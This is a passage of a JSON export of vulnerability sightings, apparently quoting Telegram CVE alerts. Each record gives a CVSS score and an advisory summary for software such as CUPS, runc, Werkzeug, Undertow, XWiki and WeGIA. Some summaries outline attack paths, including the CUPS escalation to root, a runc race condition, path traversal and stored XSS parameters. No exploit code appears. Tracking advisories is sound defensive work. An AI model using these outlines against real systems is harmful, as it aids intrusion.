https://access.redhat.com/security/cve/CVE-2024-9676\n16. https://bugzilla.redhat.com/show_bug.cgi?id=2317467\n17. https://github.com/advisories/GHSA-wq2p-5pc6-wpgf", "creation_timestamp": "2025-02-27T17:25:18.000000Z"}, {"uuid": "0742a7d0-8e1e-44b1-a593-3ea0a407eaca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VVWP-MV6J-HW6F", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/4932", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-35235\n\ud83d\udd25 CVSS Score: 4.4 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: OpenPrinting CUPS is an open source printing system for Linux and other Unix-like operating systems. In versions 2.4.8 and earlier, when starting the cupsd server with a Listen configuration item pointing to a symbolic link, the cupsd process can be caused to perform an arbitrary chmod of the provided argument, providing world-writable access to the target. Given that cupsd is often running as root, this can result in the change of permission of any user or system files to be world writable. Given the aforementioned Ubuntu AppArmor context, on such systems this vulnerability is limited to those files modifiable by the cupsd process. In that specific case it was found to be possible to turn the configuration of the Listen argument into full control over the cupsd.conf and cups-files.conf configuration files. By later setting the User and Group arguments in cups-files.conf, and printing with a printer configured by PPD with a `FoomaticRIPCommandLine` argument, arbitrary user and group (not root) command execution could be achieved, which can further be used on Ubuntu systems to achieve full root command execution. Commit ff1f8a623e090dee8a8aadf12a6a4b25efac143d contains a patch for the issue.\n\ud83d\udccf Published: 2024-06-11T14:13:23.771Z\n\ud83d\udccf Modified: 2025-02-21T16:56:42.752Z\n\ud83d\udd17 References:\n1. https://github.com/OpenPrinting/cups/security/advisories/GHSA-vvwp-mv6j-hw6f\n2. https://github.com/OpenPrinting/cups/commit/ff1f8a623e090dee8a8aadf12a6a4b25efac143d\n3. https://git.launchpad.net/ubuntu/+source/apparmor/tree/profiles/apparmor.d/abstractions/user-tmp#n21\n4. https://github.com/OpenPrinting/cups/blob/aba917003c8de55e5bf85010f0ecf1f1ddd1408e/cups/http-addr.c#L229-L240\n5. http://www.openwall.com/lists/oss-security/2024/06/11/1\n6. http://www.openwall.com/lists/oss-security/2024/06/12/4\n7. http://www.openwall.com/lists/oss-security/2024/06/12/5\n8. https://lists.debian.org/debian-lts-announce/2024/06/msg00001.html", "creation_timestamp": "2025-02-21T17:18:30.000000Z"}, {"uuid": "416ad0b3-bb94-48c7-a4e7-b5338271ae8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JFVP-7X6P-H2PV", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/4946", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-45310\n\ud83d\udd25 CVSS Score: 3.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N)\n\ud83d\udd39 Description: runc is a CLI tool for spawning and running containers according to the OCI specification. runc 1.1.13 and earlier, as well as 1.2.0-rc2 and earlier, can be tricked into creating empty files or directories in arbitrary locations in the host filesystem by sharing a volume between two containers and exploiting a race with `os.MkdirAll`. While this could be used to create empty files, existing files would not be truncated. An attacker must have the ability to start containers using some kind of custom volume configuration. Containers using user namespaces are still affected, but the scope of places an attacker can create inodes can be significantly reduced. Sufficiently strict LSM policies (SELinux/Apparmor) can also in principle block this attack -- we suspect the industry standard SELinux policy may restrict this attack's scope but the exact scope of protection hasn't been analysed. This is exploitable using runc directly as well as through Docker and Kubernetes. The issue is fixed in runc v1.1.14 and v1.2.0-rc3.\n\nSome workarounds are available. Using user namespaces restricts this attack fairly significantly such that the attacker can only create inodes in directories that the remapped root user/group has write access to. Unless the root user is remapped to an actual\nuser on the host (such as with rootless containers that don't use `/etc/sub[ug]id`), this in practice means that an attacker would only be able to create inodes in world-writable directories. A strict enough SELinux or AppArmor policy could in principle also restrict the scope if a specific label is applied to the runc runtime, though neither the extent to which the standard existing policies block this attack nor what exact policies are needed to sufficiently restrict this attack have been thoroughly tested.\n\ud83d\udccf Published: 2024-09-03T19:07:34.060Z\n\ud83d\udccf Modified: 2025-02-21T18:03:30.271Z\n\ud83d\udd17 References:\n1. https://github.com/opencontainers/runc/security/advisories/GHSA-jfvp-7x6p-h2pv\n2. https://github.com/opencontainers/runc/pull/4359\n3. https://github.com/opencontainers/runc/commit/63c2908164f3a1daea455bf5bcd8d363d70328c7\n4. https://github.com/opencontainers/runc/commit/8781993968fd964ac723ff5f360b6f259e809a3e\n5. https://github.com/opencontainers/runc/commit/f0b652ea61ff6750a8fcc69865d45a7abf37accf", "creation_timestamp": "2025-02-21T18:19:03.000000Z"}, {"uuid": "bdffb032-bc6f-47f6-9167-d6100e0e35ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-389X-839F-4RHX", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/4939", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-25193\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: Netty, an asynchronous, event-driven network application framework, has a vulnerability in versions up to and including 4.1.118.Final. An unsafe reading of environment file could potentially cause a denial of service in Netty. When loaded on an Windows application, Netty attempts to load a file that does not exist. If an attacker creates such a large file, the Netty application crash. A similar issue was previously reported as CVE-2024-47535. This issue was fixed, but the fix was incomplete in that null-bytes were not counted against the input limit. Commit d1fbda62d3a47835d3fb35db8bd42ecc205a5386 contains an updated fix.\n\ud83d\udccf Published: 2025-02-10T22:02:17.197Z\n\ud83d\udccf Modified: 2025-02-21T18:03:38.211Z\n\ud83d\udd17 References:\n1. https://github.com/netty/netty/security/advisories/GHSA-389x-839f-4rhx\n2. https://github.com/netty/netty/commit/d1fbda62d3a47835d3fb35db8bd42ecc205a5386", "creation_timestamp": "2025-02-21T18:18:54.000000Z"}, {"uuid": "8473c5ba-64dc-41c8-8a70-e8acba4220b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2G68-C3QC-8985", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/4948", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-34069\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: Werkzeug is a comprehensive WSGI web application library. The debugger in affected versions of Werkzeug can allow an attacker to execute code on a developer's machine under some circumstances. This requires the attacker to get the developer to interact with a domain and subdomain they control, and enter the debugger PIN, but if they are successful it allows access to the debugger even if it is only running on localhost. This also requires the attacker to guess a URL in the developer's application that will trigger the debugger. This vulnerability is fixed in 3.0.3.\n\ud83d\udccf Published: 2024-05-06T14:44:38.780Z\n\ud83d\udccf Modified: 2025-02-21T18:03:28.226Z\n\ud83d\udd17 References:\n1. https://github.com/pallets/werkzeug/security/advisories/GHSA-2g68-c3qc-8985\n2. https://github.com/pallets/werkzeug/commit/3386395b24c7371db11a5b8eaac0c91da5362692\n3. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HFERFN7PINV4MOGMGA3DPIXJPDCYOEJZ/\n4. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/H4SH32AM3CTPMAAEOIDAN7VU565LO4IR/\n5. https://security.netapp.com/advisory/ntap-20240614-0004/", "creation_timestamp": "2025-02-21T18:19:04.000000Z"}, {"uuid": "e18f9945-4ea7-4c58-9adc-8146da654f12", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2P94-8669-XG86", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/4997", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26622\n\ud83d\udd25 CVSS Score: 2.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: vyper is a Pythonic Smart Contract Language for the EVM. Vyper `sqrt()` builtin uses the babylonian method to calculate square roots of decimals. Unfortunately, improper handling of the oscillating final states may lead to sqrt incorrectly returning rounded up results. This issue is being addressed and a fix is expected in version 0.4.1. Users are advised to upgrade as soon as the patched release is available. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2025-02-21T21:36:19.063Z\n\ud83d\udccf Modified: 2025-02-21T21:36:19.063Z\n\ud83d\udd17 References:\n1. https://github.com/vyperlang/vyper/security/advisories/GHSA-2p94-8669-xg86\n2. https://github.com/vyperlang/vyper/pull/4486", "creation_timestamp": "2025-02-21T22:18:56.000000Z"}, {"uuid": "a8f58d87-3ba7-4b51-a171-e772be2afb88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2026", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/6189", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-10234\n\ud83d\udd25 CVSS Score: 6.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N)\n\ud83d\udd39 Description: A vulnerability was found in Wildfly, where a user may perform Cross-site scripting in the Wildfly deployment system. This flaw allows an attacker or insider to execute a deployment with a malicious payload, which could trigger undesired behavior against the server.\n\ud83d\udccf Published: 2024-10-22T13:17:57.891Z\n\ud83d\udccf Modified: 2025-03-03T11:07:27.735Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2025\n2. https://access.redhat.com/errata/RHSA-2025:2026\n3. https://access.redhat.com/security/cve/CVE-2024-10234\n4. https://bugzilla.redhat.com/show_bug.cgi?id=2320848", "creation_timestamp": "2025-03-03T11:30:18.000000Z"}, {"uuid": "a2576a54-83dc-4768-858c-1acc6d74b52c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:3138", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5795", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-4133\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A use-after-free vulnerability was found in the cxgb4 driver in the Linux kernel. The bug occurs when the cxgb4 device is detaching due to a possible rearming of the flower_stats_timer from the work queue. This flaw allows a local user to crash the system, causing a denial of service condition.\n\ud83d\udccf Published: 2023-08-03T14:32:12.421Z\n\ud83d\udccf Modified: 2025-02-27T21:11:13.168Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:2394\n2. https://access.redhat.com/errata/RHSA-2024:2950\n3. https://access.redhat.com/errata/RHSA-2024:3138\n4. https://access.redhat.com/security/cve/CVE-2023-4133\n5. https://bugzilla.redhat.com/show_bug.cgi?id=2221702", "creation_timestamp": "2025-02-27T21:25:56.000000Z"}, {"uuid": "763f68ba-987e-44a3-b648-880abb5341bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1468", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5775", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11831\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: A flaw was found in npm-serialize-javascript. The vulnerability occurs because the serialize-javascript module does not properly sanitize certain inputs, such as regex or other JavaScript object types, allowing an attacker to inject malicious code. This code could be executed when deserialized by a web browser, causing Cross-site scripting (XSS) attacks. This issue is critical in environments where serialized data is sent to web clients, potentially compromising the security of the website or web application using this package.\n\ud83d\udccf Published: 2025-02-10T15:27:46.732Z\n\ud83d\udccf Modified: 2025-02-27T20:12:57.720Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:1334\n2. https://access.redhat.com/errata/RHSA-2025:1468\n3. https://access.redhat.com/security/cve/CVE-2024-11831\n4. https://bugzilla.redhat.com/show_bug.cgi?id=2312579\n5. https://github.com/yahoo/serialize-javascript/commit/f27d65d3de42affe2aac14607066c293891cec4e\n6. https://github.com/yahoo/serialize-javascript/pull/173", "creation_timestamp": "2025-02-27T20:25:33.000000Z"}, {"uuid": "d2e96a7c-8abf-4c21-a730-7ab109f3b5a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:2394", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5795", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-4133\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A use-after-free vulnerability was found in the cxgb4 driver in the Linux kernel. The bug occurs when the cxgb4 device is detaching due to a possible rearming of the flower_stats_timer from the work queue. This flaw allows a local user to crash the system, causing a denial of service condition.\n\ud83d\udccf Published: 2023-08-03T14:32:12.421Z\n\ud83d\udccf Modified: 2025-02-27T21:11:13.168Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:2394\n2. https://access.redhat.com/errata/RHSA-2024:2950\n3. https://access.redhat.com/errata/RHSA-2024:3138\n4. https://access.redhat.com/security/cve/CVE-2023-4133\n5. https://bugzilla.redhat.com/show_bug.cgi?id=2221702", "creation_timestamp": "2025-02-27T21:25:56.000000Z"}, {"uuid": "67be0e91-9d92-417d-a1be-9679688a2db7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8785-WC3W-H8Q6", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/6584", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27513\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: OpenTelemetry dotnet is a dotnet telemetry framework. A vulnerability in OpenTelemetry.Api package 1.10.0 to 1.11.1 could cause a Denial of Service (DoS) when a tracestate and traceparent header is received. Even if an application does not explicitly use trace context propagation, receiving these headers can still trigger high CPU usage. This issue impacts any application accessible over the web or backend services that process HTTP requests containing a tracestate header. Application may experience excessive resource consumption, leading to increased latency, degraded performance, or downtime. This vulnerability is fixed in 1.11.2.\n\ud83d\udccf Published: 2025-03-05T18:12:25.867Z\n\ud83d\udccf Modified: 2025-03-05T18:19:02.492Z\n\ud83d\udd17 References:\n1. https://github.com/open-telemetry/opentelemetry-dotnet/security/advisories/GHSA-8785-wc3w-h8q6\n2. https://github.com/open-telemetry/opentelemetry-dotnet/commit/1b555c1201413f2f55f2cd3c4ba03ef4b615b6b5", "creation_timestamp": "2025-03-05T18:55:30.000000Z"}, {"uuid": "d5268ee0-5512-413e-b4ed-e9fbcd9e5813", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-998C-X8HX-737R", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/14487", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46568\n\ud83d\udd25 CVSS Score: 7.7 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P)\n\ud83d\udd39 Description: Stirling-PDF is a locally hosted web application that allows you to perform various operations on PDF files. Prior to version 0.45.0, Stirling-PDF is vulnerable to SSRF-induced arbitrary file read. WeasyPrint redefines a set of HTML tags, including img, embed, object, and others. The references to several files inside, allow the attachment of content from any webpage or local file to a PDF. This allows the attacker to read any file on the server, including sensitive files and configuration files. All users utilizing this feature will be affected. This issue has been patched in version 0.45.0.\n\ud83d\udccf Published: 2025-05-01T17:20:46.488Z\n\ud83d\udccf Modified: 2025-05-02T13:33:46.987Z\n\ud83d\udd17 References:\n1. https://github.com/Stirling-Tools/Stirling-PDF/security/advisories/GHSA-998c-x8hx-737r", "creation_timestamp": "2025-05-02T14:15:53.000000Z"}, {"uuid": "3c0eb7e1-887a-48ac-b8ae-e8dc8c54fb1e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3738-P9X3-MV9R", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/6621", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-26474\n\ud83d\udd25 CVSS Score: 10 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: XWiki Platform is a generic wiki platform. Starting in version 13.10, it's possible to use the right of an existing document content author to execute a text area property. This has been patched in XWiki 14.10, 14.4.7, and 13.10.11. There are no known workarounds.\n\ud83d\udccf Published: 2023-03-02T18:12:16.209Z\n\ud83d\udccf Modified: 2025-03-05T21:21:51.637Z\n\ud83d\udd17 References:\n1. https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-3738-p9x3-mv9r\n2. https://jira.xwiki.org/browse/XWIKI-20373", "creation_timestamp": "2025-03-05T21:34:58.000000Z"}, {"uuid": "29151682-9d60-4fe6-95d5-c4251985ad27", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4884", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/6207", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-5971\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Undertow, where the chunked response hangs after the body was flushed. The response headers and body were sent but the client would continue waiting as Undertow does not send the expected 0\\r\\n termination of the chunked response. This results in uncontrolled resource consumption, leaving the server side to a denial of service attack. This happens only with Java 17 TLSv1.3 scenarios.\n\ud83d\udccf Published: 2024-07-08T20:51:29.223Z\n\ud83d\udccf Modified: 2025-03-03T14:17:30.281Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4392\n2. https://access.redhat.com/errata/RHSA-2024:4884\n3. https://access.redhat.com/errata/RHSA-2024:5143\n4. https://access.redhat.com/errata/RHSA-2024:5144\n5. https://access.redhat.com/errata/RHSA-2024:5145\n6. https://access.redhat.com/errata/RHSA-2024:5147\n7. https://access.redhat.com/errata/RHSA-2024:6508\n8. https://access.redhat.com/errata/RHSA-2024:6883\n9. https://access.redhat.com/security/cve/CVE-2024-5971\n10. https://bugzilla.redhat.com/show_bug.cgi?id=2292211", "creation_timestamp": "2025-03-03T14:30:00.000000Z"}, {"uuid": "42ee46b8-7182-4850-8be2-ba297bf07c03", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4392", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/6207", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-5971\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Undertow, where the chunked response hangs after the body was flushed. The response headers and body were sent but the client would continue waiting as Undertow does not send the expected 0\\r\\n termination of the chunked response. This results in uncontrolled resource consumption, leaving the server side to a denial of service attack. This happens only with Java 17 TLSv1.3 scenarios.\n\ud83d\udccf Published: 2024-07-08T20:51:29.223Z\n\ud83d\udccf Modified: 2025-03-03T14:17:30.281Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4392\n2. https://access.redhat.com/errata/RHSA-2024:4884\n3. https://access.redhat.com/errata/RHSA-2024:5143\n4. https://access.redhat.com/errata/RHSA-2024:5144\n5. https://access.redhat.com/errata/RHSA-2024:5145\n6. https://access.redhat.com/errata/RHSA-2024:5147\n7. https://access.redhat.com/errata/RHSA-2024:6508\n8. https://access.redhat.com/errata/RHSA-2024:6883\n9. https://access.redhat.com/security/cve/CVE-2024-5971\n10. https://bugzilla.redhat.com/show_bug.cgi?id=2292211", "creation_timestamp": "2025-03-03T14:30:00.000000Z"}, {"uuid": "2663d4cf-4c82-4599-8a97-3a561f773ba5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X3WR-75QX-55CW", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/6229", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27420\n\ud83d\udd25 CVSS Score: 6.4 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H)\n\ud83d\udd39 Description: WeGIA is an open source Web Manager for Institutions with a focus on Portuguese language users. A Stored Cross-Site Scripting (XSS) vulnerability was identified in the atendido_parentesco_adicionar.php endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the descricao parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk. This vulnerability fix in 3.2.16.\n\ud83d\udccf Published: 2025-03-03T16:05:16.087Z\n\ud83d\udccf Modified: 2025-03-03T16:05:16.087Z\n\ud83d\udd17 References:\n1. https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-x3wr-75qx-55cw\n2. https://github.com/LabRedesCefetRJ/WeGIA/commit/add78bb177cbb29477ff2121b533651a9d673918", "creation_timestamp": "2025-03-03T16:30:33.000000Z"}, {"uuid": "481df23f-ede6-4fe4-8fd2-aade5e1c7b9d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7QQJ-XHVR-46FV", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/6257", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-29004\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: hap-wi/roxy-wi is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. A Path Traversal vulnerability was found in the current version of Roxy-WI (6.3.9.0 at the moment of writing this report). The vulnerability can be exploited via an HTTP request to /app/options.py and the config_file_name parameter. Successful exploitation of this vulnerability could allow an attacker with user level privileges to obtain the content of arbitrary files on the file server within the scope of what the server process has access to. The root-cause of the vulnerability lies in the get_config function of the /app/modules/config/config.py file, which only checks for relative path traversal, but still allows to read files from absolute locations passed via the config_file_name parameter.\n\ud83d\udccf Published: 2023-04-17T18:34:07.972Z\n\ud83d\udccf Modified: 2025-03-03T19:19:37.825Z\n\ud83d\udd17 References:\n1. https://github.com/hap-wi/roxy-wi/security/advisories/GHSA-7qqj-xhvr-46fv", "creation_timestamp": "2025-03-03T19:30:49.000000Z"}, {"uuid": "8a69de6e-6dc7-4bce-997e-96eda1c60b99", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VH64-54PX-QGF8", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/6226", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27421\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: Abacus is a highly scalable and stateless counting API. A critical goroutine leak vulnerability has been identified in the Abacus server's Server-Sent Events (SSE) implementation. The issue occurs when clients disconnect from the /stream endpoint, as the server fails to properly clean up resources and terminate associated goroutines. This leads to resource exhaustion where the server continues running but eventually stops accepting new SSE connections while maintaining high memory usage. The vulnerability specifically involves improper channel cleanup in the event handling mechanism, causing goroutines to remain blocked indefinitely. This vulnerability is fixed in 1.4.0.\n\ud83d\udccf Published: 2025-03-03T16:19:23.914Z\n\ud83d\udccf Modified: 2025-03-03T16:19:23.914Z\n\ud83d\udd17 References:\n1. https://github.com/JasonLovesDoggo/abacus/security/advisories/GHSA-vh64-54px-qgf8\n2. https://github.com/JasonLovesDoggo/abacus/commit/898ff1204e11317cc161240b660e63eed5a72b33", "creation_timestamp": "2025-03-03T16:30:30.000000Z"}, {"uuid": "542784c4-dc20-4ac1-adc7-d84eafcdb98e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FFCG-QR75-98MG", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/6230", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27418\n\ud83d\udd25 CVSS Score: 6.4 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H)\n\ud83d\udd39 Description: WeGIA is an open source Web Manager for Institutions with a focus on Portuguese language users. A Stored Cross-Site Scripting (XSS) vulnerability was identified in the adicionar_tipo_atendido.php endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the tipo parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk. This vulnerability is fixed in 3.2.16.\n\ud83d\udccf Published: 2025-03-03T16:03:24.070Z\n\ud83d\udccf Modified: 2025-03-03T16:03:24.070Z\n\ud83d\udd17 References:\n1. https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-ffcg-qr75-98mg\n2. https://github.com/LabRedesCefetRJ/WeGIA/commit/e2f258cc8fed8b7e5850114ce6e74bd9ba4f397f", "creation_timestamp": "2025-03-03T16:30:34.000000Z"}, {"uuid": "35bafe2d-9506-4497-b19b-dbffae186eb0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:7442", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/6205", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-7885\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Undertow where the ProxyProtocolReadListener reuses the same StringBuilder instance across multiple requests. This issue occurs when the parseProxyProtocolV1 method processes multiple requests on the same HTTP connection. As a result, different requests may share the same StringBuilder instance, potentially leading to information leakage between requests or responses. In some cases, a value from a previous request or response may be erroneously reused, which could lead to unintended data exposure. This issue primarily results in errors and connection termination but creates a risk of data leakage in multi-request environments.\n\ud83d\udccf Published: 2024-08-21T14:13:36.579Z\n\ud83d\udccf Modified: 2025-03-03T14:18:10.445Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:11023\n2. https://access.redhat.com/errata/RHSA-2024:6508\n3. https://access.redhat.com/errata/RHSA-2024:6883\n4. 